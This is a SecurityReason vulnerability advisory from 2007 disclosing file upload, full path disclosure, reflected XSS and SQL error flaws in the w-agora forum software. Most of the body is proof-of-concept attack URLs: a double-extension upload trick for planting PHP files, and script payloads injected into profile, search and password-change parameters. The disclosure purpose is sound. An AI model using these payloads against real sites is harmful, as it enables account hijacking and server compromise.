|
 |
| SecurityReason | ||
| WLB | ||
| Services | ||
| RSS | ||
| Corporate | ||
| Note | ||
If you have found a vulnerability, please send to our SecurityAlert Database : |
||
Home  SecurityAlert Database |
||||
SecurityAlert : 2462 CVE : CVE-2007-1607 CVE : CVE-2007-1606 CVE : CVE-2007-1605 CVE : CVE-2007-1604 SecurityRisk : High  (About) Remote Exploit : Yes Local Exploit : No Exploit Given : Yes Credit : laurent gaffié Published : 23.03.2007
Advisory Text : vendor website: http://www.w-agora.com/ bug: multiples file upload,xss,full path disclosure,error sql global risk: critical file upload : there's actually 2 ways to upload a file on w-agora : 1)on the forum you can post some attached file with your message and you can upload any kind of file then your file will be located here : site.com/w-agora/forums/hello/hello/notes/ ( hello = name of the forum ) then you can just browse :site.com/w-agora/forums/ to find out where is your file. 2) http://site.com/w-agora/browse_avatar.php?site=hello ( replace hello , by your forum name. ) with this script you can upload any file with a double extension like : file.php.jpg the file will be located here : http://site.com/w-agora/images/avatars/file.php.jpg full path: http://site.com/w-agora/rss.php?site=blablablablabla http://site.com/w-agora/rss.php?site=agora&bn=blibloubla http://site.com/w-agora/rss.php?site[]=agora http://site.com/w-agora/rss.php?site=agora&bn[]= http://site.com/w-agora/index.php?site[]=hello http://site.com/w-agora/index.php?site=hello&bn[]= http://site.com/w-agora/profile.php?site[]= http://site.com/w-agora/search.php?bn[]= http://site.com/w-agora/index.php?bn=hello_hello&sort[]=subject http://site.com/w-agora/search.php?bn=hello_hello&gosearch=1&pattern[]=1 http://site.com/w-agora/search.php?bn=hello_hello&gosearch=1&pattern=1&s earch_date[]=0 xss get : http://site.com/w-agora/profile.php?site=hello&showuser='"><script>alert (document.cookie)</script> http://site.com/w-agora/search.php?bn=hello_hello&gosearch=1&pattern=1&s earch_date=0&search_fields[body]=1&search_fields[subject]=1&search_forum ='"><script>alert(document.cookie)</script> http://site.com/w-agora/search.php?bn=hello_hello&gosearch=1&pattern=1&s earch_date=0&search_fields[body]=1&search_fields[subject]=1&search_forum =hello_hello&search_mode=0&search_user='"><script>alert(document.cookie) </script> http://site.com/w-agora/change_password.php?newpasswd1=1&newpasswd2=1&pa sswd=1&site=hello&userid='"><script>alert(document.cookie)</script> error sql : http://site.com/w-agora/search.php?bn=hello_hello&gosearch=1&pattern=1&s earch_date=0&search_fields[body]=1&search_fields[subject]=1&search_forum ='[sql] http://site.com/w-agora/search.php?bn=hello_hello&gosearch=1&pattern=1&s earch_date=0&search_fields[body]=1&search_fields[subject]=1&search_forum =hello_hello&search_mode=0&search_user='[sql] regards laurent gaffié  Feedback : If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com. |
||||
| Alert | ||
Multiple Vendors libc/gdtoa printf(3) Array Overrun
SecurityReason realised new advisory about vulnerabilities libc/gdtoa... |
||
| Apache |  |
|
» Apache Tomcat |
||
» Apache Tomcat User |
||
| PHP | |
|
» PHP |
||
- 2009-05-30| Copyright © SecurityReason.com. All Rights Reserved. |